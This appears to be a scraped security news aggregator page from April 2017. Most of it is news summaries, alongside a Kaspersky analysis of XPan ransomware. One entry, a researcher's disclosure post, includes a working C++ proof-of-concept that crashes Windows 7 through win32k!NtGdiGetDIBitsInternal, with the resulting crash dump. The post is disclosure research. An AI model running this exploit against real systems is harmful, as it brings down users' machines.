Security-Portal.cz is an Internet portal focused on computer security, hacking, anonymity, computer networks, programming, encryption, exploits, Linux and BSD systems. It runs a number of interesting services and supports its community in interesting projects.

Category

The Cloud Foundry Approach to Container Storage and Security

LinuxSecurity.com - 24 April, 2017 - 12:06
LinuxSecurity.com: Recently, The New Stack published an article titled "Containers and Storage: Why We Aren't There Yet" covering a talk from IBM's James Bottomley at the Linux Foundation's Vault conference in March. Both the talk and article focused on one of the central problems we've been working to address in the Cloud Foundry Foundation's Diego Persistence project team, so we thought it would be a good idea to highlight the features we've added to mitigate it.
Category: Hacking & Security

Russian hacker arrested in Spain for bot-herding not election-fiddling

LinuxSecurity.com - 24 April, 2017 - 12:03
LinuxSecurity.com: Last week ended badly for Russian hackers. The United States Department of Justice revealed that Peter Yuryevich Levashov was picked up in Barcelona a couple of weeks back for his association with the Kelihos botnet. Levashov said he'd been told the arrest was due to his creation of a virus in some way linked to the Russia's suspected interference in the recent US presidential election.
Category: Hacking & Security

Windows Kernel Local Denial-of-Service #5: win32k!NtGdiGetDIBitsInternal (Windows 7-10)

j00ru//vx tech blog - 24 April, 2017 - 11:39

Today I’ll discuss yet another way to bring the Windows operating system down from the context of an unprivileged user, in a 5th and final post in the series. It hardly means that this is the last way to crash the kernel or even the last way that I’m aware of, but covering these bugs indefinitely could soon become boring and quite repetitive, so I’ll stop here and return with other interesting material in the near future. Links to the previous posts about Windows DoS issues are listed below:

The bug explained today can be found in the win32k!NtGdiGetDIBitsInternal system call, which has been around since the very early days of Windows existence (at least Windows NT). The syscall is used by the GetDIBits, BitBlt and StretchBlt documented API functions, and has been recently subject to patching in Microsoft’s April Patch Tuesday, in order to fix an unrelated double-fetch vulnerability reported by Project Zero (CVE-2017-0058, issue #1078 in the tracker). The DoS problem was also reported to the vendor at that time, but due to its low severity, it didn’t meet the bar for a security bulletin.

The purpose of the function is to acquire bitmap data based on a Device Context, HBITMAP object, starting scan line, number of scan lines, a BITMAPINFO header and an output buffer. This is illustrated by the following function declaration present in the ReactOS sources:

INT APIENTRY NtGdiGetDIBitsInternal( _In_ HDC hdc, _In_ HBITMAP hbm, _In_ UINT iStartScan, _In_ UINT cScans, _Out_writes_bytes_opt_(cjMaxBits) LPBYTE pjBits, _Inout_ LPBITMAPINFO pbmi, _In_ UINT iUsage, _In_ UINT cjMaxBits, _In_ UINT cjMaxInfo)

This declaration suggests that a maximum of cjMaxBits bytes can be written to the pjBits output memory area. The conclusion seems to be correct after taking a look at the actual implementation of the function in win32k.sys, where we can find the following code snippet:

As shown above, if the value of the cjMaxBits argument is non-zero, it is prioritized over the return value of the GreGetBitmapBitsSize routine. It is also interesting to note that after performing an initial validation of the pjBits pointer with a ProbeForWrite call, the user-mode memory region spanning from pjBits to pjBits+cjMaxBits-1 is locked, so it cannot be unmapped or restricted beyond the PAGE_READWRITE access rights. By doing so, the kernel makes sure that all subsequent read/write accesses to that area are safe (i.e. won’t trigger an exception) until a corresponding MmUnsecureVirtualMemory call, which in turn allows it to skip setting up a very broad try/except block over the entire logic of the system call, or using a temporary buffer. On the other hand, the logic is very reliant on the specific number of bytes being locked in memory, so if the kernel later tries to dereference even a single byte outside of the secured user-mode region, it is risking triggering an unhandled exception and an accompanying Blue Screen of Death.

The core of the syscall logic resides in an internal GreGetDIBitsInternal function:

which further calls GreGetDIBitsInternalWorker. In that routine, the bitmap pixels are actually copied into the user-mode output buffer. One special corner case is when the caller requests the output data to be RLE-compressed through the pbmi->bmiHeader.biCompression field, which yields the following additional calls to EncodeRLE4 or EncodeRLE8:

Here, the 2nd argument is the pointer to locked user-mode memory, and the 5th argument is the maximum number of bytes which can be written to it. The inconsistency is quite obvious: while NtGdiGetDIBitsInternal uses cjMaxBits (if it’s non-zero) as the maximum buffer length, the internal EncodeRLE functions use another value passed through an input structure field (bmi->bmiHeader.biSizeImage). If the former is smaller than the latter, and the size of the requested data is sufficiently large, it is possible to make EncodeRLE access bytes outside of the protected region, thus generating the desired unhandled kernel exception. Notably, this condition can only lead to a local DoS, since the buffer overflow is linear, and the buffer itself is guaranteed to be located in ring-3 memory with the initial ProbeForWrite call. Nonetheless, I find the flaw interesting, as it demonstrates the importance of consistency in kernel data processing, especially where buffer lengths are involved.
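The length mismatch described above, modelled in user-mode C as an added example (this is not j00ru's code and not win32k's EncodeRLE8): a toy RLE8 encoder is handed either the untrusted biSizeImage or a limit clamped to the secured length cjMaxBits, and a canary past the secured region shows which dispatch stays in bounds. The bmi_hdr_t struct, the encoder and the dispatch functions are assumptions made for the model; SECURED = 1 mirrors the single secured byte in the PoC.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stub for the caller-controlled BITMAPINFO header: only the field the
 * encoder consults matters for the model. */
typedef struct { uint32_t biSizeImage; } bmi_hdr_t;

enum { SECURED = 1, BUF = 64 };  /* 1 byte "secured", 63 canary bytes after it */

/* Toy RLE8 encoder for one scan line (not win32k's EncodeRLE8): emits
 * (count, value) pairs for runs of equal bytes, then the 00 00 end-of-line
 * marker. Every write is checked against out_max; returns bytes written,
 * or 0 if the encoded line would not fit in out_max bytes. */
size_t encode_rle8(const uint8_t *px, size_t npx, uint8_t *out, size_t out_max) {
    size_t w = 0, i = 0;
    while (i < npx) {
        size_t run = 1;
        while (i + run < npx && px[i + run] == px[i] && run < 255) run++;
        if (w + 2 > out_max) return 0;
        out[w++] = (uint8_t)run;
        out[w++] = px[i];
        i += run;
    }
    if (w + 2 > out_max) return 0;
    out[w++] = 0;
    out[w++] = 0;
    return w;
}

/* Vulnerable dispatch: the encoder's limit comes from biSizeImage, while the
 * region that was actually secured is only cjMaxBits bytes long. */
size_t get_dibits_vulnerable(const uint8_t *px, size_t npx, uint8_t *out,
                             size_t cjMaxBits, const bmi_hdr_t *bmi) {
    (void)cjMaxBits;  /* the secured length never reaches the encoder */
    return encode_rle8(px, npx, out, bmi->biSizeImage);
}

/* Hardened dispatch: a single limit, derived the way the syscall picks the
 * secured length (cjMaxBits wins when non-zero) and never above biSizeImage. */
size_t get_dibits_hardened(const uint8_t *px, size_t npx, uint8_t *out,
                           size_t cjMaxBits, const bmi_hdr_t *bmi) {
    size_t limit = cjMaxBits ? cjMaxBits : bmi->biSizeImage;
    if (bmi->biSizeImage < limit) limit = bmi->biSizeImage;
    return encode_rle8(px, npx, out, limit);
}

/* Constructed input: a 100-pixel 8bpp scan line, 60 x 0xFF then 40 x 0x00,
 * whose RLE8 form is 3C FF 28 00 00 00 (6 bytes). The header claims 64 bytes
 * of output space, but only SECURED bytes are; the rest is a 0xCC canary. */
static size_t run_case(int hardened, uint8_t out[BUF]) {
    uint8_t px[100];
    bmi_hdr_t bmi = { 64 };
    memset(px, 0xFF, 60);
    memset(px + 60, 0x00, 40);
    memset(out, 0xCC, BUF);
    return hardened ? get_dibits_hardened(px, 100, out, SECURED, &bmi)
                    : get_dibits_vulnerable(px, 100, out, SECURED, &bmi);
}

static int canary_intact(const uint8_t out[BUF]) {  /* 1 if nothing past SECURED was written */
    for (size_t i = SECURED; i < BUF; i++)
        if (out[i] != 0xCC) return 0;
    return 1;
}

size_t vulnerable_bytes_written(void) { uint8_t o[BUF]; return run_case(0, o); }
size_t hardened_bytes_written(void)   { uint8_t o[BUF]; return run_case(1, o); }
int vulnerable_in_bounds(void) { uint8_t o[BUF]; run_case(0, o); return canary_intact(o); }
int hardened_in_bounds(void)   { uint8_t o[BUF]; run_case(1, o); return canary_intact(o); }

int main(void) {
    printf("vulnerable: wrote %zu bytes, in bounds: %d\n", vulnerable_bytes_written(), vulnerable_in_bounds());
    printf("hardened:   wrote %zu bytes, in bounds: %d\n", hardened_bytes_written(), hardened_in_bounds());
    return 0;
}
```

In the kernel the canary bytes would be unmapped or unsecured memory, so the vulnerable dispatch's 6-byte write is exactly the kind of access the article's crash dump shows faulting inside EncodeRLE8.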

A functional proof-of-concept is quite simple and can be found below. It works on Windows 7 32-bit (due to a hardcoded syscall number) and expects an input bitmap in the test.bmp file. We used a 100 x 100 x 24bpp white image for testing purposes. The essence of the bug is visible in lines 42 and 57 of the original listing (the biSizeImage field and the cjMaxBits argument): only a single byte of the output buffer is secured, but the kernel may write as many as 0x10000000.

#include <Windows.h>
#include <assert.h>

// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
  __asm{mov eax, ApiNumber};
  __asm{lea edx, ApiNumber + 4};
  __asm{int 0x2e};
}

int main() {
  // Windows 7 32-bit.
  CONST ULONG __NR_NtGdiGetDIBitsInternal = 0x10b3;

  // Initialize the graphic subsystem for this process.
  LoadLibraryA("gdi32.dll");

  // Load an external bitmap as HBITMAP and select it in the device context.
  HDC hdc = CreateCompatibleDC(NULL);
  HBITMAP hbmp = (HBITMAP)LoadImage(NULL, L"test.bmp", IMAGE_BITMAP, 0, 0, LR_LOADFROMFILE);
  assert(hdc != NULL);
  assert(hbmp != NULL);
  SelectObject(hdc, hbmp);

  // Allocate a 4-byte buffer for the output data.
  LPBYTE lpNewRegion = (LPBYTE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  assert(lpNewRegion != NULL);
  memset(lpNewRegion, 0xcc, 0x1000);
  LPBYTE output_buffer = &lpNewRegion[0xffc];

  // Trigger the vulnerability.
  BITMAPINFOHEADER bmi = {
    sizeof(BITMAPINFOHEADER), // biSize
    100,                      // biWidth
    100,                      // biHeight
    1,                        // biPlanes
    8,                        // biBitcount
    BI_RLE8,                  // biCompression
    0x10000000,               // biSizeImage
    0,                        // biXPelsPerMeter
    0,                        // biYPelsPerMeter
    0,                        // biClrUsed
    0,                        // biClrImportant
  };

  SystemCall32(__NR_NtGdiGetDIBitsInternal,
               hdc,
               hbmp,
               0,
               1,
               output_buffer,
               &bmi,
               DIB_RGB_COLORS,
               1,
               sizeof(bmi)
  );

  return 0;
}

Starting the program gives us the expected result in the form of a BSoD:

The full crash summary is as follows:

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x80000003.  This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG.  This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG.  This will let us see why this breakpoint is
happening.
Arguments:
Arg1: c0000005, The exception code that was not handled
Arg2: 8ef2584c, The address that the exception occurred at
Arg3: 949e19a0, Trap Frame
Arg4: 00000000

Debugging Details:
------------------

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

FAULTING_IP:
win32k!EncodeRLE8+1ac
8ef2584c c60300          mov     byte ptr [ebx],0

TRAP_FRAME:  949e19a0 -- (.trap 0xffffffff949e19a0)
ErrCode = 00000002
eax=000f1002 ebx=000f1000 ecx=00000004 edx=fb8d4f61 esi=00000064 edi=fb8d4efc
eip=8ef2584c esp=949e1a14 ebp=949e1a40 iopl=0         nv up ei ng nz ac pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010297
win32k!EncodeRLE8+0x1ac:
8ef2584c c60300          mov     byte ptr [ebx],0          ds:0023:000f1000=??
Resetting default scope

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x8E

PROCESS_NAME:  usermode_oob_w

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

LAST_CONTROL_TRANSFER:  from 816f3dff to 8168f9d8

STACK_TEXT:
949e0f5c 816f3dff 00000003 c890b2ef 00000065 nt!RtlpBreakWithStatusInstruction
949e0fac 816f48fd 00000003 949e13b0 00000000 nt!KiBugCheckDebugBreak+0x1c
949e1370 816f3c9c 0000008e c0000005 8ef2584c nt!KeBugCheck2+0x68b
949e1394 816c92f7 0000008e c0000005 8ef2584c nt!KeBugCheckEx+0x1e
949e1930 81652996 949e194c 00000000 949e19a0 nt!KiDispatchException+0x1ac
949e1998 8165294a 949e1a40 8ef2584c badb0d00 nt!CommonDispatchException+0x4a
949e1a40 8eddaf69 fb8d4f61 ff0f0ffc 00000064 nt!KiExceptionExit+0x192
949e1b04 8edf8c05 00000028 949e1b5c 949e1b74 win32k!GreGetDIBitsInternalWorker+0x73e
949e1b7c 8ede39cc 06010327 0905032f 00000000 win32k!GreGetDIBitsInternal+0x21b
949e1c08 81651db6 06010327 0905032f 00000000 win32k!NtGdiGetDIBitsInternal+0x250
949e1c08 00e45ba6 06010327 0905032f 00000000 nt!KiSystemServicePostCall

Thanks for reading!

XPan, I am your father

Kaspersky Securelist - 24 April, 2017 - 10:55

While we have previously written on the now infamous XPan ransomware family, some of its variants are still affecting users primarily located in Brazil. Harvesting victims via weakly protected RDP (remote desktop protocol) connections, criminals are manually installing the ransomware and encrypting any files which can be found on the system.

Interestingly, this XPan variant is not necessarily new in the malware ecosystem. However, someone has chosen to keep on infecting victims with it, encouraging security researchers to hunt for samples related to the increasing number of incident reports. This sample is what could be considered as the “father” of other XPan ransomware variants. A considerable amount of indicators within the source code depict the early origins of this sample.

“Recupere seus arquivos aqui.txt” loosely translated to “recover your files here” is a phrase that not many Brazilian users are eager to see in their desktops.

The ransomware author left a message for Kaspersky in other versions and has done the same in this one; together with the traces of the NMoreira “CrypterApp.cpp”, there’s a clear link between the different variants in this malware family.

NMoreira, XPan, TeamXRat, different names but same author.

Even though many Brazilian-Portuguese strings are present upon initial analysis, there were a couple that caught our attention. Firstly, the ransomware uses a batch file which passes a command line parameter to an invoked executable file; this parameter is “eusoudejesus”, which means “I’m from Jesus”. Developers tend to leave tiny breadcrumbs of their personality behind in each one of their creations, and in this sample we found many of them.

A brief religious reference found in this XPan variant.

Secondly, a reference to a Brazilian celebrity is made, albeit indirectly. “Computador da Xuxa” was a toy computer sold in Brazil during the nineties; however, it’s also a popular expression used to make fun of very old computers with limited power.

This is what cybercriminals think of your encrypted computer: just a toy they can control.

“Muito bichado” amounts to finding a lot of problems in this type of system; in this case it means that the environment in which XPan is executing is not playing fair and the execution is quite buggy.

Lastly, we have the ransom note demanding that the victim send an email to the account ‘one@proxy.tg’. Considering that the extension for all the encrypted files in this variant is ‘.one’, this seems like a pretty straightforward naming convention for the criminals’ campaigns.

The rescue note in Portuguese.

Upon closer inspection, we discovered that this sample is nearly identical to another version of Xpan which used to be distributed back in November 2016 and used the extension “.__AiraCropEncrypted!”. Every bit of executable code remains the same, which is quite surprising, because since that time there were several newer versions of this malware with an updated encryption algorithm. Both samples have the same PE timestamp dating back to the 31st of October 2016.

The only difference between the two is the configuration block which contains the following information:

  • list of target file extensions;
  • ransom notes;
  • commands to execute before and after encryption;
  • the public RSA key of the criminals.

The decrypted configuration block of Xpan that uses the extension “.one”.

The file encryption algorithm also remains the same. For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contents using AES-256 in CBC mode with a zero IV. The string S is encrypted using the criminals’ RSA public key from the configuration block and stored at the beginning of the encrypted file.

According to one of the victims that contacted us, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as before: the user sends a message to a mailbox with his unique ID and patiently awaits further instructions.

The victims so far are small and medium businesses in Brazil: ranging from a dentist clinic to a driving school, demonstrating once again that ransomware makes no distinctions and everyone is at risk. As long as there are victims, assisting them and providing decryption tools whenever possible is necessary, no matter the ransomware family or when it was created.

Victims: we can help

This time luck is on the victims’ side! Upon thorough investigation and reverse engineering of the sample of “.one” version of Xpan, we discovered that the criminals used a vulnerable cryptographic algorithm implementation. It allowed us to break encryption as with the previously described Xpan version.

We successfully helped a driving school and a dentist clinic to recover their files for free and as usual we encourage victims of this ransomware to not pay the ransom and to contact our technical support for assistance in decryption.

Brazilian cybercriminals are focusing their efforts on creating new and local ransomware families, attacking small companies and unprotected users. We believe this is the next step in the ransomware fight: going from global-scale attacks to a more localized scenario, where local cybercriminals will create new families from scratch, in their own language, and resort to RaaS (Ransomware-as-a-service) as a way to monetize their attacks.

MD5 reference

dd7033bc36615c0fe0be7413457dccbf – Trojan-Ransom.Win32.Xpan.e (encrypted file extension: “.one”)
54217c1ea3e1d4d3dc024fc740a47757 – Trojan-Ransom.Win32.Xpan.d (encrypted file extension: “.__AiraCropEncrypted!”)

Monday review – the hot 18 stories of the week

Sophos Naked Security - 24 April, 2017 - 10:28
From Burger King's Google Home trigger and how tech scammers have made millions to the many vulnerabilities found in Linksys routers, & more!

Artificial intelligence is still in its infancy, but we are already ceasing to understand how it actually works. That is a problem

Zive.cz - security - 24 April, 2017 - 09:46
** It's here: people are ceasing to understand computers ** Neural network systems are starting to work in such a way that even their creators don't know exactly what is going on inside ** In the future this could be a serious problem
Category: Hacking & Security

Russia spied on the e-mails of Danish army personnel

Novinky.cz - security - 24 April, 2017 - 08:52
Russia, using a group of hackers, penetrated the Danish army's systems and in 2015 and 2016 had access to the e-mails of some of its personnel. The Danish newspaper Berlingske reported this on Sunday, citing Danish defence minister Claus Hjort Frederiksen.
Category: Hacking & Security

The Unhappy Boss

InfoSec Institute Resources - 24 April, 2017 - 00:52

Large organizations have an added pressure of having so much organizational information publicly available on the Internet. If an attacker has performed due diligence during the planning phase it would be possible they could find organizational information such as employees, roles, and reporting structures – this is especially true for larger companies. This information can […]

The post The Unhappy Boss appeared first on InfoSec Resources.

Category: Hacking & Security

Insidious Karmen: even your grandmother could operate this ransomware

Zive.cz - security - 23 April, 2017 - 19:00
** How hard is it to run a ransomware campaign? ** Karmen resembles a CRM system more than malware ** Anyone can find their way around the web interface
Category: Hacking & Security

Please Volunteer

InfoSec Institute Resources - 23 April, 2017 - 00:46

A successful phishing campaign has at least three common denominators, which are accurate target information, successful message delivery, and execution of the malicious intent on the client side. Oftentimes phishing is thought of as a user exploit only, but the fact of the matter is that phishing exploitation requires the breakdown of several controls […]

The post Please Volunteer appeared first on InfoSec Resources.

Category: Hacking & Security

Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

The Hacker News - 22 April, 2017 - 17:13
Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet. Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows
Category: Hacking & Security

SMSVova Spyware Hiding in ‘System Update’ App Ejected From Google Play Store

Threatpost - 22 April, 2017 - 14:00
An Android app that falsely claimed to be a tool for keeping smartphones up-to-date with the latest version of the OS was found surreptitiously tracking the physical location of its users using spyware called SMSVova.
Category: Hacking & Security

US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking

The Hacker News - 22 April, 2017 - 12:25
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals. This sentence is so far the longest sentence ever imposed in the United States for a hacking-related case. Roman Valeryevich Seleznev, 32, the
Category: Hacking & Security

US court sends Russian hacker to prison for 27 years

Novinky.cz - security - 22 April, 2017 - 11:37
On Friday a court in Seattle, USA, sentenced Russian hacker Roman Seleznev to 27 years in prison for causing damages of 169 million dollars (4.2 billion crowns) through Internet credit card theft and other online fraud. According to American lawyers, it is the highest sentence so far handed down in the USA for similar crimes.
Category: Hacking & Security

Russian man gets longest-ever US hacking sentence, 27 years in prison

Ars Technica - 22 April, 2017 - 02:19

Images of Seleznev with stacks of cash were found on his laptop following his 2014 arrest in the Maldives. (credit: Department of Justice)

Russian hacker Roman Seleznev was sentenced to 27 years in prison today. He was convicted of causing more than $169 million in damage by hacking into point-of-sale computers.

Seleznev, aka "Track2," would hack into computers belonging to both small businesses and large financial institutions, according to prosecutors. He was arrested in the Maldives in 2014 with a laptop that had more than 1.7 million credit card numbers. After an August 2016 trial, Seleznev was convicted on 38 counts, including wire fraud, intentional damage to a protected computer, and aggravated identity theft.

The sentence is quite close to the 30 years that the government asked for. Prosecutors said Seleznev deserved the harsh sentence because he was "a pioneer" who helped grow the market for stolen credit card data and because he "became one of the most revered point-of-sale hackers in the criminal underworld."


Category: Hacking & Security

Invitation to a Compromise

InfoSec Institute Resources - 22 April, 2017 - 00:39

It is possible that your organization can be phished by avenues other than email. Social-engineering attacks are part technical but mostly psychological, and the more creative the attacker, the better the probability of a successful attack. A delivery method that isn’t typical but is growing in popularity as of late is phishing over meeting […]

The post Invitation to a Compromise appeared first on InfoSec Resources.

Category: Hacking & Security

>10,000 Windows computers may be infected by advanced NSA backdoor

Ars Technica - 21 April, 2017 - 22:12

A script scanning the Internet for computers infected by DoublePulsar. On the left, a list of IPs Shodan detected having the backdoor installed. On the right are pings used to manually check if a machine is infected. (credit: Dan Tentler)

Security experts believe that tens of thousands of Windows computers may have been infected by a highly advanced National Security Agency backdoor. The NSA backdoor was included in last week's leak by the mysterious group known as Shadow Brokers.

DoublePulsar, as the NSA implant is code-named, was detected on more than 107,000 computers in one Internet scan. That scan was performed over the past few days by researchers from Binary Edge, a security firm headquartered in Switzerland. Binary Edge has more here. Separate mass scans, one done by Errata Security CEO Rob Graham and another by researchers from Below0day, detected roughly 41,000 and 30,000 infected machines, respectively. To remain stealthy, DoublePulsar doesn't write any files to the computers it infects. This design prevents it from persisting after an infected machine is rebooted. The lack of persistence may be one explanation for the widely differing results.


Category: Hacking & Security

Skype Fixes ‘SPYKE’ Credential Phishing Remote Execution Bug

Threatpost - 21 April, 2017 - 22:00
Microsoft fixed a bug in Skype last month that could have allowed an attacker to execute code on the system it was running on, phish Skype credentials and crash the application.
Category: Hacking & Security

News in brief: Google Home gets smarter; Hackers target South Korean missiles; Harry Huskey dies

Sophos Naked Security - 21 April, 2017 - 19:56
Your daily round-up of some of the other stories in the news